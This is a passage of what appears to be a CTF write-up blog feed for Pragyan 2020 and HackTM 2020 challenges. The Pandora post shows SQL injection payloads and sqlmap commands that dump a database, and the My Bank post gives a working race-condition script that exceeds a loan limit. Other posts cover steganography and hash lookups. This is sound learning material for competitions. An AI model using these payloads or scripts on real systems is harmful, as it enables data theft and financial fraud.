<p>So, download the orignal <a href="https://shattered.io/static/shattered-1.pdf">file</a>, and compute the base64 encode twice to it:</p>
<div class="highlight"><pre><span></span><code>$ <span class="nb">echo</span> <span class="s2">"p_ctf{</span><span class="k">$(</span><span class="nb">echo</span> -n <span class="k">$(</span><span class="nb">printf</span> <span class="s2">"</span><span class="k">$(</span>sha1sum shattered-1.pdf <span class="p">|</span> sed <span class="s1">'s/^\([^ \t\s[:space:]]\+\).*$/\1/'</span><span class="k">)</span><span class="s2">"</span> <span class="p">|</span> base64<span class="k">)</span> <span class="p">|</span> base64<span class="k">)</span><span class="s2">}"</span>
p_ctf<span class="o">{</span><span class="nv">TXpnM05qSmpaamRtTlRVNU16UmlNelJrTVRjNVlXVTJZVFJqT0RCallXUmpZMkppTjJZd1lRPT0</span><span class="o">=}</span><span class="sb">`</span>.
</code></pre></div>Pragyan 2020 - Pandora2020-02-26T00:00:00+01:002020-02-26T00:00:00+01:00nlegalltag:blog.nlegall.fr,2020-02-26:/pragyan-2020-pandora.html<div class="highlight"><pre><span></span><code>Solved by: 7%
First solvers: nguyendqn
Jake in pandora needs to save Naʼvi from Human invasion. But he is not sure human`s army base`s locations.
Help him find those location so that he can take them down before they start their move.
link: http://ctf.pragyan.org:14000 …</code></pre></div><div class="highlight"><pre><span></span><code>Solved by: 7%
First solvers: nguyendqn
Jake in pandora needs to save Naʼvi from Human invasion. But he is not sure human`s army base`s locations.
Help him find those location so that he can take them down before they start their move.
link: http://ctf.pragyan.org:14000
</code></pre></div>
<p>We need to create an account with a username and password (<code>admin123</code> here). When you get in, the webpage shows you that you don't have any message.</p>
<p>A quick test with the <code>NAME</code> param with <code>' OR 1=1 --'</code> show all the message. Great! We found a SQL injection. Let's try to get all data with <code>sqlmap</code>.</p>
<h2>Valid the injection</h2>
<div class="highlight"><pre><span></span><code>$ sqlmap -u <span class="s2">"http://ctf.pragyan.org:14000/profile.php?success=welcome&NAME=admin123"</span> --tamper<span class="o">=</span>space2comment -p <span class="s2">"NAME"</span> --cookie<span class="o">=</span><span class="s2">"PHPSESSID=0b30b4ce5ebe911385e432ac76ef2e10"</span>
<span class="o">[</span>...<span class="o">]</span>
<span class="o">[</span><span class="m">11</span>:49:19<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> GET parameter <span class="s1">'NAME'</span> appears to be <span class="s1">'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'</span> injectable
it looks like the back-end DBMS is <span class="s1">'MySQL'</span>. Do you want to skip <span class="nb">test</span> payloads specific <span class="k">for</span> other DBMSes? <span class="o">[</span>Y/n<span class="o">]</span> Y
<span class="o">[</span>...<span class="o">]</span>
GET parameter <span class="s1">'NAME'</span> is vulnerable. Do you want to keep testing the others <span class="o">(</span><span class="k">if</span> any<span class="o">)</span>? <span class="o">[</span>y/N<span class="o">]</span>
sqlmap identified the following injection point<span class="o">(</span>s<span class="o">)</span> with a total of <span class="m">80</span> HTTP<span class="o">(</span>s<span class="o">)</span> requests:
---
Parameter: NAME <span class="o">(</span>GET<span class="o">)</span>
Type: time-based blind
Title: MySQL ><span class="o">=</span> <span class="m">5</span>.0.12 AND time-based blind <span class="o">(</span>query SLEEP<span class="o">)</span>
Payload: <span class="nv">success</span><span class="o">=</span>welcome<span class="p">&</span><span class="nv">NAME</span><span class="o">=</span>admin123<span class="s1">' AND (SELECT 5886 FROM (SELECT(SLEEP(5)))YUbz) AND '</span>iTBY<span class="s1">'='</span>iTBY
---
</code></pre></div>
<h2>Dump database</h2>
<div class="highlight"><pre><span></span><code>$ sqlmap -u <span class="s2">"http://ctf.pragyan.org:14000/profile.php?success=welcome&NAME=admin123"</span> --tamper<span class="o">=</span>space2comment -p <span class="s2">"NAME"</span> --cookie<span class="o">=</span><span class="s2">"PHPSESSID=0b30b4ce5ebe911385e432ac76ef2e10"</span> --dbs
<span class="o">[</span>...<span class="o">]</span>
<span class="o">[</span><span class="m">11</span>:51:01<span class="o">]</span> <span class="o">[</span>WARNING<span class="o">]</span> it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
<span class="k">do</span> you want sqlmap to try to optimize value<span class="o">(</span>s<span class="o">)</span> <span class="k">for</span> DBMS delay responses <span class="o">(</span>option <span class="s1">'--time-sec'</span><span class="o">)</span>? <span class="o">[</span>Y/n<span class="o">]</span>
<span class="o">[</span><span class="m">11</span>:51:16<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieved: <span class="m">2</span>
<span class="o">[</span><span class="m">11</span>:51:21<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> adjusting <span class="nb">time</span> delay to <span class="m">2</span> seconds due to good response <span class="nb">times</span>
information_schema
<span class="o">[</span><span class="m">11</span>:53:55<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieved: capture_the_flag
available databases <span class="o">[</span><span class="m">2</span><span class="o">]</span>:
<span class="o">[</span>*<span class="o">]</span> capture_the_flag
<span class="o">[</span>*<span class="o">]</span> information_schema
<span class="o">[</span>...<span class="o">]</span>
</code></pre></div>
<h2>Dump tables</h2>
<div class="highlight"><pre><span></span><code>$ sqlmap -u <span class="s2">"http://ctf.pragyan.org:14000/profile.php?success=welcome&NAME=admin123"</span> --tamper<span class="o">=</span>space2comment -p <span class="s2">"NAME"</span> --cookie<span class="o">=</span><span class="s2">"PHPSESSID=0b30b4ce5ebe911385e432ac76ef2e10"</span> -D capture_the_flag --tables
<span class="o">[</span>...<span class="o">]</span>
<span class="o">[</span><span class="m">11</span>:58:26<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieved: pandoralocations
<span class="o">[</span><span class="m">12</span>:00:44<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieved: pandoramsg
<span class="o">[</span><span class="m">12</span>:01:25<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieved: pandorausers
Database: capture_the_flag
<span class="o">[</span><span class="m">3</span> tables<span class="o">]</span>
+------------------+
<span class="p">|</span> pandoralocations <span class="p">|</span>
<span class="p">|</span> pandoramsg <span class="p">|</span>
<span class="p">|</span> pandorausers <span class="p">|</span>
+------------------+
</code></pre></div>
<h2>Dump data</h2>
<div class="highlight"><pre><span></span><code>$ sqlmap -u <span class="s2">"http://ctf.pragyan.org:14000/profile.php?success=welcome&NAME=admin123"</span> --tamper<span class="o">=</span>space2comment -p <span class="s2">"NAME"</span> --cookie<span class="o">=</span><span class="s2">"PHPSESSID=0b30b4ce5ebe911385e432ac76ef2e10"</span> -D capture_the_flag -T pandoralocations --dump
<span class="o">[</span>...<span class="o">]</span>
Database: capture_the_flag
Table: pandoralocations
<span class="o">[</span><span class="m">3</span> entries<span class="o">]</span>
+-------+----------------------------------------+-----------+
<span class="p">|</span> base <span class="p">|</span> latitude <span class="p">|</span> longitude <span class="p">|</span>
+-------+----------------------------------------+-----------+
<span class="p">|</span> base1 <span class="p">|</span> <span class="m">10</span>.0054 N <span class="p">|</span> <span class="m">45</span>.0245E <span class="p">|</span>
<span class="p">|</span> base2 <span class="p">|</span> p_ctf<span class="o">{</span>4vengers_455emb1e_0ne_l45t_t1me<span class="o">}</span> <span class="p">|</span> <span class="m">56</span>.0245e <span class="p">|</span>
<span class="p">|</span> base3 <span class="p">|</span> <span class="m">45</span>.9999 S <span class="p">|</span> <span class="m">66</span>.04578W <span class="p">|</span>
+-------+----------------------------------------+-----------+
</code></pre></div>
<p>YEAH! We got finally the flag : <code>p_ctf{4vengers_455emb1e_0ne_l45t_t1me}</code>.</p>Pragyan 2020 - Pretty Peculiar Pokemon2020-02-26T00:00:00+01:002020-02-26T00:00:00+01:00nlegalltag:blog.nlegall.fr,2020-02-26:/pragyan-2020-pretty-peculiar-pokemon.html<div class="highlight"><pre><span></span><code>Pretty Peculiar Pokemon (150pts)
Solved by: 12%
First solvers: metusec
Ash is on his mission to become world's best pokemon master. On his way he finds an amazing pokemon named charlizard, which he intends to catch in his pokeball. But he finds out that the last pokeball he had …</code></pre></div><div class="highlight"><pre><span></span><code>Pretty Peculiar Pokemon (150pts)
Solved by: 12%
First solvers: metusec
Ash is on his mission to become world's best pokemon master. On his way he finds an amazing pokemon named charlizard, which he intends to catch in his pokeball. But he finds out that the last pokeball he had was missing. Maybe some pokemon took it. Can you help ash to find that hidden pokemon to get his pokeball back?
Here's a file you will need on this mission.
But try to find the perfect path, it can be a "timewaste", i assure you.
</code></pre></div>
<p>We have an archive with a lot of files inside:</p>
<div class="highlight"><pre><span></span><code>tree
.
├── pokemon
│ ├── abomasnow.png
│ ├── abra.png
│ ├── absol.png
<span class="o">[</span>...<span class="o">]</span>
│ ├── .pikachu
│ ├── pikachu.png
<span class="o">[</span>...<span class="o">]</span>
│ ├── zweilous.png
│ └── zygarde-50.png
└── pokemondata.pdf
<span class="m">1</span> directory, <span class="m">810</span> files
</code></pre></div>
<p>We need to open the first PDF <code>pokemondata.pdf</code>. A word is used with quote on the description. Let's try it. And it works!</p>
<div class="highlight"><pre><span></span><code><span class="err">|Name|Type1|Type2|</span>
<span class="err">|---|---|---|</span>
<span class="err">|bulbasaur|Grass|Poison|</span>
<span class="err">|ivysaur|Grass|Poison|</span>
<span class="err">|venusaur|Grass|Poison|</span>
</code></pre></div>
<p>It's 18 pages of Pokemon name and its types. But, one line is strange: <code>bGV0bWVzbGVlcA==</code> (page 18).</p>
<div class="highlight"><pre><span></span><code>$ <span class="nb">echo</span> <span class="s2">"bGV0bWVzbGVlcA=="</span> <span class="p">|</span> base64 -d
letmesleep
</code></pre></div>
<p>Hum, a new word. Maybe a password for another PDF or file. We found a hidden folder <code>.pikachu</code> with a password protected password <code>may.pdf</code>. But, this word doesn't work.</p>
<p>Maybe something is hidden in one of the Pokemon pictures. Let's short them by size.</p>
<div class="highlight"><pre><span></span><code>$ ls -lSh
total <span class="m">3936</span>
-rw-r--r-- <span class="m">1</span> nlegall nlegall 68K févr. <span class="m">23</span> <span class="m">03</span>:24 jigglypuff.png
</code></pre></div>
<p>Ok, huge size for a small picture and all the other files are around 3K. Maybe the word before can be used with <code>steghide</code> to extract some extra file:</p>
<div class="highlight"><pre><span></span><code>$ steghide extract -sf jigglypuff.png
Enter passphrase:
wrote extracted data to <span class="s2">"galf.txt"</span>.
$ cat galf.txt
Congrats you found the hidden flag
p_ctf<span class="o">{</span>j!gglypuff_w@n1<span class="nv">$_10_$leep_n0w</span><span class="o">}</span>
</code></pre></div>Pragyan 2020 - Up can be Down2020-02-26T00:00:00+01:002020-02-26T00:00:00+01:00nlegalltag:blog.nlegall.fr,2020-02-26:/pragyan-2020-up-can-be-down.html<div class="highlight"><pre><span></span><code>Solved by: 22%
First solvers: x0r19x91
Mr. Robot is being sent to future. But accidently he lost his passkey which he needs to activate the Time Machine. But he is smart and had already asked Elliot to save the key inside a file to use it in such conditions but …</code></pre></div><div class="highlight"><pre><span></span><code>Solved by: 22%
First solvers: x0r19x91
Mr. Robot is being sent to future. But accidently he lost his passkey which he needs to activate the Time Machine. But he is smart and had already asked Elliot to save the key inside a file to use it in such conditions but safely so that others can't retrieve it easily. Can you help Mr. Robot to find the secret passkey from the file?
Open ME!!!
</code></pre></div>
<p>Like usual, we can take a look to the meta-data from the image:</p>
<div class="highlight"><pre><span></span><code>$ exiftool mrRobot.jpg
<span class="o">[</span>...<span class="o">]</span>
Format : U29tZSBTSEEgbWF5YmUhISEh
Comment : c82358dfb202ce9cfddc34e13d403fa3
Image Width : <span class="m">2560</span>
<span class="o">[</span>...<span class="o">]</span>
</code></pre></div>
<p>Hum, a strange comment inside. We can use <a href="https://crackstation.net/">crackstation</a> to get the clear text if the hash is a know one. The website gave us a result:</p>
<p><code>c82358dfb202ce9cfddc34e13d403fa3 sha256 avium</code></p>
<p>We can now use this clear work to extract some hidden informations from the file:</p>
<div class="highlight"><pre><span></span><code>$ steghide extract -sf mrRobot.jpg
Enter passphrase:
wrote extracted data to <span class="s2">"flag.txt"</span>.
$ cat flag.txt
Congrats! This was way too wasy :P
This is the key:
p_ctf<span class="o">{</span>s0rry_6ut_1_@m_n0t_@_r060t<span class="o">}</span>
</code></pre></div>Pragyan 2020 - Welcome!!!2020-02-26T00:00:00+01:002020-02-26T00:00:00+01:00nlegalltag:blog.nlegall.fr,2020-02-26:/pragyan-2020-welcome.html<p><em>solves : 123</em></p>
<div class="highlight"><pre><span></span><code># Welcome!!! (10pts)
Solved by: 38%
First solvers: Balsn
Go and checkout our bot in case you are bored and get some bonus points: https://t.me/pctf_bot
</code></pre></div>
<p>We need to connect to the bot from telegram.</p>
<p><img alt="welcome1" src="https://blog.nlegall.fr/images/pragyan/welcome1.png"></p>
<p>Ok, nice bot. Let's try some commands and see what we can …</p><p><em>solves : 123</em></p>
<div class="highlight"><pre><span></span><code># Welcome!!! (10pts)
Solved by: 38%
First solvers: Balsn
Go and checkout our bot in case you are bored and get some bonus points: https://t.me/pctf_bot
</code></pre></div>
<p>We need to connect to the bot from telegram.</p>
<p><img alt="welcome1" src="https://blog.nlegall.fr/images/pragyan/welcome1.png"></p>
<p>Ok, nice bot. Let's try some commands and see what we can get from it.</p>
<p><img alt="welcome2" src="https://blog.nlegall.fr/images/pragyan/welcome2.png"></p>
<p>Oh! The <code>/movie</code> seems nice. If we look to the first letter of each movie, we can the begging of the flag: <code>PCTF</code>.</p>
<div class="highlight"><pre><span></span><code><span class="err">Pulp Fiction</span>
<span class="err">Casablanca</span>
<span class="err">Terminator</span>
<span class="err">Final Destination</span>
<span class="err">Batman Begins</span>
<span class="err">Once Upon A Time In Hollywood</span>
<span class="err">Tomb Raider</span>
<span class="err">Se7en</span>
<span class="err">Aquaman</span>
<span class="err">Ratatouille</span>
<span class="err">Ender's Game</span>
<span class="err">Casino Royale</span>
<span class="err">Oblivion</span>
<span class="err">Oceans 11</span>
<span class="err">Little Women</span>
<span class="err">Aladdin</span>
<span class="err">Finding Nemo</span>
</code></pre></div>
<p>Let's do it with all the names and add the missing char to get the final flag: <code>p_ctf{bots_are_cool_af}</code>.</p>HackTM Quals 20202020-02-06T00:00:00+01:002020-02-06T00:00:00+01:00nlegalltag:blog.nlegall.fr,2020-02-06:/hacktm-quals-2020.html<p><em><a href="https://ctfx.hacktm.ro">HackTM_CTF_2020</a> - <a href="https://ctftime.org/event/956">CTFTime</a></em></p>
<p>This CTF is really good and challenges are well made. However, it's not the best one to start. The level is quite hard but you can learn a lot with it. The crypto and pwn/reverse use a lot of really good tricks. If you are quite familiar …</p><p><em><a href="https://ctfx.hacktm.ro">HackTM_CTF_2020</a> - <a href="https://ctftime.org/event/956">CTFTime</a></em></p>
<p>This CTF is really good and challenges are well made. However, it's not the best one to start. The level is quite hard but you can learn a lot with it. The crypto and pwn/reverse use a lot of really good tricks. If you are quite familiar with CTF, I recommend to give it a try for the next edition.</p>
<p><img alt="bilan.png" src="https://blog.nlegall.fr/images/hacktm/profile.png"></p>
<h2>Crypto</h2>
<ul>
<li><a href="/hacktm-quals20-rsa-is-easy-1.html">RSA is easy #1</a></li>
<li><a href="/hacktm-quals20-rsa-is-easy-2.html">RSA is easy #2</a></li>
<li><a href="/hacktm-quals20-prison-break.html">Prison Break</a></li>
</ul>
<h2>misc</h2>
<ul>
<li><a href="/hacktm-quals20-romanian-gibberish.html">Romanian Gibberish</a></li>
<li><a href="/hacktm-quals20-the-dragon-sleeps-at-night.html">The dragon sleeps at night</a></li>
</ul>
<h2>web</h2>
<ul>
<li><a href="/hacktm-quals20-my-bank.html">My Bank</a></li>
</ul>HackTM Quals20 - My Bank2020-02-06T00:00:00+01:002020-02-06T00:00:00+01:00nlegalltag:blog.nlegall.fr,2020-02-06:/hacktm-quals20-my-bank.html<p><em>solves : 70</em></p>
<div class="highlight"><pre><span></span><code>My Bank
280 Points
Who's got my money?
Please abstain from brute-forcing files.
http://178.128.175.6:50090/
Author: nytr0gen
</code></pre></div>
<p>We got a URL who is a login page.</p>
<p><img alt="my_bank1" src="https://blog.nlegall.fr/images/hacktm/mybank_1.png"></p>
<p>We can put any login to the field and we get redirect to the default page. This …</p><p><em>solves : 70</em></p>
<div class="highlight"><pre><span></span><code>My Bank
280 Points
Who's got my money?
Please abstain from brute-forcing files.
http://178.128.175.6:50090/
Author: nytr0gen
</code></pre></div>
<p>We got a URL who is a login page.</p>
<p><img alt="my_bank1" src="https://blog.nlegall.fr/images/hacktm/mybank_1.png"></p>
<p>We can put any login to the field and we get redirect to the default page. This page allows to loan some BTC from the bank.</p>
<p><img alt="my_bank2" src="https://blog.nlegall.fr/images/hacktm/mybank_2.png"></p>
<p>This money allow us to buy some goods (Chocolate - 10 tBTC, Python Book - 40 tBTC, WreckTheLine Stickers - 105 tBTC) and the flag for 1337 tBTC.</p>
<p><img alt="my_bank3" src="https://blog.nlegall.fr/images/hacktm/mybank_3.png"></p>
<p>But, the first page show that we can only loan 600 tBTC from the bank. We can't get more.</p>
<p>So, we need to make a trick to the server to allow us loan more faster than the server check the reaming loan allow amount. I made a Python script who perform a total of 15 request. It should allow us to buy the flag.</p>
<div class="highlight"><pre><span></span><code><span class="kn">from</span> <span class="nn">concurrent.futures</span> <span class="kn">import</span> <span class="n">ThreadPoolExecutor</span> <span class="k">as</span> <span class="n">PoolExecutor</span>
<span class="kn">import</span> <span class="nn">http.client</span><span class="o">,</span> <span class="nn">urllib.parse</span>
<span class="kn">import</span> <span class="nn">socket</span>
<span class="kn">from</span> <span class="nn">bs4</span> <span class="kn">import</span> <span class="n">BeautifulSoup</span>
<span class="kn">import</span> <span class="nn">requests</span>
<span class="kn">import</span> <span class="nn">sys</span>
<span class="k">def</span> <span class="nf">get_it</span><span class="p">(</span><span class="n">url</span><span class="p">):</span>
<span class="k">try</span><span class="p">:</span>
<span class="c1"># always set a timeout when you connect to an external server</span>
<span class="n">connection</span> <span class="o">=</span> <span class="n">http</span><span class="o">.</span><span class="n">client</span><span class="o">.</span><span class="n">HTTPConnection</span><span class="p">(</span><span class="n">url</span><span class="p">,</span> <span class="n">timeout</span><span class="o">=</span><span class="mi">1</span><span class="p">)</span>
<span class="n">connection</span><span class="o">.</span><span class="n">request</span><span class="p">(</span><span class="s2">"POST"</span><span class="p">,</span> <span class="s2">"/"</span><span class="p">,</span> <span class="n">params</span><span class="p">,</span> <span class="n">headers</span><span class="p">)</span>
<span class="n">response</span> <span class="o">=</span> <span class="n">connection</span><span class="o">.</span><span class="n">getresponse</span><span class="p">()</span>
<span class="k">return</span> <span class="n">response</span><span class="o">.</span><span class="n">read</span><span class="p">()</span>
<span class="k">except</span> <span class="n">socket</span><span class="o">.</span><span class="n">timeout</span><span class="p">:</span>
<span class="c1"># in a real world scenario you would probably do stuff if the</span>
<span class="c1"># socket goes into timeout</span>
<span class="k">pass</span>
<span class="n">URL</span> <span class="o">=</span> <span class="p">[</span>
<span class="s2">"178.128.175.6:50090"</span>
<span class="p">]</span> <span class="o">*</span> <span class="mi">15</span>
<span class="n">headers</span> <span class="o">=</span> <span class="p">{</span> <span class="s2">"Cookie"</span><span class="p">:</span> <span class="s2">"session="</span><span class="o">+</span><span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="s2">"User-Agent"</span><span class="p">:</span> <span class="s2">"Mozilla/5.0 (X11; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"</span><span class="p">,</span> <span class="s2">"Content-Type"</span><span class="p">:</span> <span class="s2">"application/x-www-form-urlencoded"</span> <span class="p">}</span>
<span class="n">soup</span> <span class="o">=</span> <span class="n">BeautifulSoup</span><span class="p">(</span><span class="n">requests</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s2">"http://178.128.175.6:50090/"</span><span class="p">,</span> <span class="n">headers</span><span class="o">=</span><span class="n">headers</span><span class="p">)</span><span class="o">.</span><span class="n">content</span><span class="p">,</span> <span class="n">features</span><span class="o">=</span><span class="s2">"lxml"</span><span class="p">)</span>
<span class="n">token</span> <span class="o">=</span> <span class="n">soup</span><span class="o">.</span><span class="n">find</span><span class="p">(</span><span class="s1">'input'</span><span class="p">,</span> <span class="nb">dict</span><span class="p">(</span><span class="n">name</span><span class="o">=</span><span class="s1">'csrf_token'</span><span class="p">))[</span><span class="s1">'value'</span><span class="p">]</span>
<span class="n">params</span> <span class="o">=</span> <span class="n">urllib</span><span class="o">.</span><span class="n">parse</span><span class="o">.</span><span class="n">urlencode</span><span class="p">({</span><span class="s1">'loan'</span><span class="p">:</span> <span class="s1">'100'</span><span class="p">,</span> <span class="s1">'csrf_token'</span><span class="p">:</span> <span class="n">token</span> <span class="p">})</span>
<span class="k">with</span> <span class="n">PoolExecutor</span><span class="p">(</span><span class="n">max_workers</span><span class="o">=</span><span class="mi">4</span><span class="p">)</span> <span class="k">as</span> <span class="n">executor</span><span class="p">:</span>
<span class="k">for</span> <span class="n">_</span> <span class="ow">in</span> <span class="n">executor</span><span class="o">.</span><span class="n">map</span><span class="p">(</span><span class="n">get_it</span><span class="p">,</span> <span class="n">URL</span><span class="p">):</span>
<span class="k">pass</span>
<span class="n">soup</span> <span class="o">=</span> <span class="n">BeautifulSoup</span><span class="p">(</span><span class="n">requests</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s2">"http://178.128.175.6:50090/store"</span><span class="p">,</span> <span class="n">headers</span><span class="o">=</span><span class="n">headers</span><span class="p">)</span><span class="o">.</span><span class="n">content</span><span class="p">,</span> <span class="n">features</span><span class="o">=</span><span class="s2">"lxml"</span><span class="p">)</span>
<span class="n">money</span> <span class="o">=</span> <span class="n">soup</span><span class="o">.</span><span class="n">find_all</span><span class="p">(</span><span class="s2">"li"</span><span class="p">)</span>
<span class="nb">print</span><span class="p">(</span><span class="n">money</span><span class="p">[</span><span class="mi">5</span><span class="p">])</span>
<span class="k">if</span> <span class="s2">"1,500"</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">money</span><span class="p">[</span><span class="mi">5</span><span class="p">]:</span>
<span class="nb">print</span><span class="p">(</span><span class="s2">"Failed! Try again"</span><span class="p">)</span>
<span class="n">exit</span><span class="p">()</span>
<span class="k">pass</span>
<span class="n">soup</span> <span class="o">=</span> <span class="n">BeautifulSoup</span><span class="p">(</span><span class="n">requests</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s2">"http://178.128.175.6:50090/store"</span><span class="p">,</span> <span class="n">headers</span><span class="o">=</span><span class="n">headers</span><span class="p">)</span><span class="o">.</span><span class="n">content</span><span class="p">,</span> <span class="n">features</span><span class="o">=</span><span class="s2">"lxml"</span><span class="p">)</span>
<span class="n">token</span> <span class="o">=</span> <span class="n">soup</span><span class="o">.</span><span class="n">find</span><span class="p">(</span><span class="s1">'input'</span><span class="p">,</span> <span class="nb">dict</span><span class="p">(</span><span class="n">name</span><span class="o">=</span><span class="s1">'csrf_token'</span><span class="p">))[</span><span class="s1">'value'</span><span class="p">]</span>
<span class="n">params</span> <span class="o">=</span> <span class="n">urllib</span><span class="o">.</span><span class="n">parse</span><span class="o">.</span><span class="n">urlencode</span><span class="p">({</span><span class="s1">'item'</span><span class="p">:</span> <span class="s1">'1337'</span><span class="p">,</span> <span class="s1">'csrf_token'</span><span class="p">:</span> <span class="n">token</span> <span class="p">})</span>
<span class="nb">print</span><span class="p">(</span><span class="n">params</span><span class="p">)</span>
<span class="n">r</span> <span class="o">=</span> <span class="n">requests</span><span class="o">.</span><span class="n">post</span><span class="p">(</span><span class="s2">"http://178.128.175.6:50090/store"</span><span class="p">,</span> <span class="n">headers</span><span class="o">=</span><span class="n">headers</span><span class="p">,</span> <span class="n">data</span><span class="o">=</span><span class="n">params</span><span class="p">)</span>
<span class="n">soup</span> <span class="o">=</span> <span class="n">BeautifulSoup</span><span class="p">(</span><span class="n">r</span><span class="o">.</span><span class="n">text</span><span class="p">,</span> <span class="n">features</span><span class="o">=</span><span class="s2">"lxml"</span><span class="p">)</span>
<span class="n">mydivs</span> <span class="o">=</span> <span class="n">soup</span><span class="o">.</span><span class="n">findAll</span><span class="p">(</span><span class="s2">"div"</span><span class="p">,</span> <span class="p">{</span><span class="s2">"class"</span><span class="p">:</span> <span class="s2">"alert-success"</span><span class="p">})</span>
<span class="nb">print</span><span class="p">(</span><span class="n">mydivs</span><span class="p">)</span>
</code></pre></div>
<p>You may need to run the script a few times to get the correct amount of money.</p>
<div class="highlight"><pre><span></span><code>$ python bank.py <span class="s2">"COOKIE"</span>
<li>Money: <span class="m">1</span>,100.00 tBTC</li>
Failed! Try again
$ python bank.py <span class="s2">"COOKIE"</span>
<span class="o">[</span>...<span class="o">]</span> Well <span class="k">done</span>! You have just bought a HackTM<span class="o">{</span>9f19d6b8fdc9f5c6426343f5b004e6c6794d96b9be329402af463c294297550b<span class="o">}</span> with <span class="m">1337</span> tBTC.<span class="o">[</span>...<span class="o">]</span>
</code></pre></div>HackTM Quals20 - Prison Break2020-02-05T00:00:00+01:002020-02-05T00:00:00+01:00nlegalltag:blog.nlegall.fr,2020-02-05:/hacktm-quals20-prison-break.html<p><em>solves : 92</em></p>
<div class="highlight"><pre><span></span><code>Prison Break
119 Points
Author: FeDEX
Your friend has been captured by some country's secret services and is being held in a prison. Having reached the prison, you realise there is a code there that you need to break.
The enemies have been kind enough to leave …</code></pre></div><p><em>solves : 92</em></p>
<div class="highlight"><pre><span></span><code>Prison Break
119 Points
Author: FeDEX
Your friend has been captured by some country's secret services and is being held in a prison. Having reached the prison, you realise there is a code there that you need to break.
The enemies have been kind enough to leave a large file containing 3 numbers on each line and the following message for you:
"Start with a list of 10^7 zeros and for every line containing a,b,c separated by a space in the given file, add c modulo 10 to every number in your list between indices a and b (a included only).
Indices start at 1 in the list. At the end, compute the product modulo 999999937 of the nonzero digits in your list and you will obtain the password needed to free your friend".
The problem is that your friend needs medication within the next 3 days so can you break the password soon enough?
Flag Format: HackTM{CODE}
Challenge Files: https://drive.google.com/file/d/1CNwGf_lKq8wHA8qYQJFkqP5HCybmYBel/view
</code></pre></div>
<p>We got a huge file (138Mb) with a lot of lines:</p>
<div class="highlight"><pre><span></span><code>$ wc -l Given_File.txt
<span class="m">9999999</span> Given_File.txt
</code></pre></div>
<p>Each line is composed by three numbers as evoqued in the description (a, b and c):</p>
<div class="highlight"><pre><span></span><code>183 183 0
548 3000548 5
91 8000091 5
41 2000041 8
95 1000095 1
296 296 4
625 625 2
</code></pre></div>
<p>With the same description, we can clean the file to got less lines and speed up the computation time to get code the code:</p>
<div class="highlight"><pre><span></span><code>$ cat Given_File.txt <span class="p">|</span> sort -n -k <span class="m">1</span> <span class="p">|</span> uniq -c <span class="p">|</span> sed <span class="s1">'s/^[ \t]*//;s/[ \t]*$//'</span> <span class="p">|</span> grep -v <span class="s1">' 0'</span> > clean_file
</code></pre></div>
<ul>
<li>sort the line by the first number (and not the entire line)</li>
<li>count each line to add before it the occurence number</li>
<li>replace the tabulation added before</li>
<li>remove all the line ended by 0 since no loop will be done with it</li>
</ul>
<div class="highlight"><pre><span></span><code><span class="n">file</span> <span class="o">=</span> <span class="nb">open</span><span class="p">(</span><span class="s2">"clean_file"</span><span class="p">,</span> <span class="s1">'r'</span><span class="p">)</span>
<span class="n">l</span> <span class="o">=</span> <span class="p">[]</span>
<span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">9000999</span><span class="p">):</span>
<span class="n">l</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>
<span class="k">for</span> <span class="n">line</span> <span class="ow">in</span> <span class="n">file</span><span class="p">:</span>
<span class="n">o</span><span class="p">,</span><span class="n">a</span><span class="p">,</span><span class="n">b</span><span class="p">,</span><span class="n">c</span> <span class="o">=</span> <span class="n">line</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="s1">' '</span><span class="p">)</span>
<span class="n">value</span> <span class="o">=</span> <span class="p">(</span><span class="nb">int</span><span class="p">(</span><span class="n">c</span><span class="p">)</span> <span class="o">%</span> <span class="mi">10</span><span class="p">)</span> <span class="o">*</span> <span class="nb">int</span><span class="p">(</span><span class="n">o</span><span class="p">)</span>
<span class="k">if</span> <span class="n">value</span> <span class="o">==</span> <span class="mi">0</span><span class="p">:</span>
<span class="k">continue</span>
<span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="nb">int</span><span class="p">(</span><span class="n">a</span><span class="p">),</span> <span class="nb">int</span><span class="p">(</span><span class="n">b</span><span class="p">)):</span>
<span class="n">l</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">+=</span> <span class="n">value</span>
<span class="n">f</span> <span class="o">=</span> <span class="p">[]</span>
<span class="n">f</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>
<span class="k">for</span> <span class="n">v</span> <span class="ow">in</span> <span class="n">l</span><span class="p">:</span>
<span class="n">current</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">v</span><span class="p">)</span> <span class="o">%</span> <span class="mi">10</span>
<span class="k">if</span> <span class="n">current</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">:</span>
<span class="n">f</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="nb">int</span><span class="p">(</span><span class="n">v</span><span class="p">)</span> <span class="o">%</span> <span class="mi">10</span><span class="p">)</span>
<span class="n">final</span> <span class="o">=</span> <span class="mi">1</span>
<span class="k">for</span> <span class="n">a</span> <span class="ow">in</span> <span class="n">f</span><span class="p">:</span>
<span class="k">if</span> <span class="n">a</span> <span class="o">==</span> <span class="mi">0</span><span class="p">:</span>
<span class="k">continue</span>
